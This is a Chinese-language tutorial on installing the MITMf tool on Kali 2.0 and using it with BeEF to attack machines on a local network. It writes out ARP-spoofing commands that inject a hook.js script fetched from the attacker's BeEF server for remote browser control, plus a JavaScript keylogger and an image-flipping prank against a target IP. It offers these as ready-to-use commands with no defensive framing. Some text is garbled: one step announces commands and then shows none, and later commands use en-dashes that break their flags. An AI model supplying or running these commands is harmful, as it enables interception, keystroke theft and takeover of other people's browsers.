mitmf 是一款用來進行中間人攻擊的工具，它可以結合 BeEF 一起來使用，並利用 BeEF強大的 hook 指令碼來控制目標客戶端。

下面讓我們一起看看如何在 Kali2.0上安裝與使用 mitmf 。mitmf預設在Kali2.0上並未安裝，在之前的版本有安裝。

Kali2.0下直接安裝也行，閱讀到這裡可以直接跳到圖（apt-get install mitmf）

本地環境：Windows xp、IE6、kali2.0

首先，我們先進行工具依賴包的安裝。開啟 terminal 終端，輸入如下命令:

apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
 

以上結果出現一些安裝包無法安裝的情況，這裡我們無需理會，繼續我們的下一步操作即可。

依賴包安裝完成後，就可以開始安裝mitmf 了、輸入命令:

apt-get install mitmf

不過這樣安裝完成後 mitmf 依然無法正常使用它的一些功能，因為缺少了 twisted 的版本相容性。我們來安裝適合 mitmf 的 twisted 。如果你已經安裝過，那麼先解除安裝之前的版本。輸入命令如下:

pip uninstall twisted

並用 wget 命令進行下載。

wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2
 

安裝 twisted 。

pip install ./Twisted-15.5.0.tar.bz2

這樣，我們就可以正常使用 mitmf 了。

下面讓我們執行 BeEF來呼叫 BeEF強大的 hook 指令碼。首先我們進入BeEF目錄並啟動它。

cd /usr/share/beef-xss

./beef

BeEF的使用可以參考其他資料，這裡就不多寫了。

好了，接下來 正式安裝，輸入以下命令：

我們在瀏覽器開啟UI介面後，下面我們就用 mitmf 進行中間人攻擊。輸入如下命令:

mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.100 --inject --js-url http://192.168.15.131:3000/hook.js
 

這條命令的原理是，利用ARP進行地址欺騙，讓區域網中的其他電腦，誤認為Kali為閘道器路由。當目標機器開啟瀏覽器，就會被注入 hook 指令碼，之後便可在BeEF上進行客戶端的控制。

mitmf不僅能和BeEF來結合使用，自身還有許多強大的功能。例如軟體自帶的鍵盤記錄功能，輸入命令:

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100–jskeylogger

最後，在介紹個mitmf 一個有趣的惡搞功能。它可以使目標瀏覽網頁時，所有的圖片都倒轉 180度。是不是很有意思！

mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100 –upsidedownternet

更多關於此工具的使用，可以參考相關手冊與文章，這裡只是做個入門的介紹。

參考資料：

http://www.secist.com/archives/1056.html

https://github.com/byt3bl33d3r/MITMf

http://www.freebuf.com/sectool/45796.html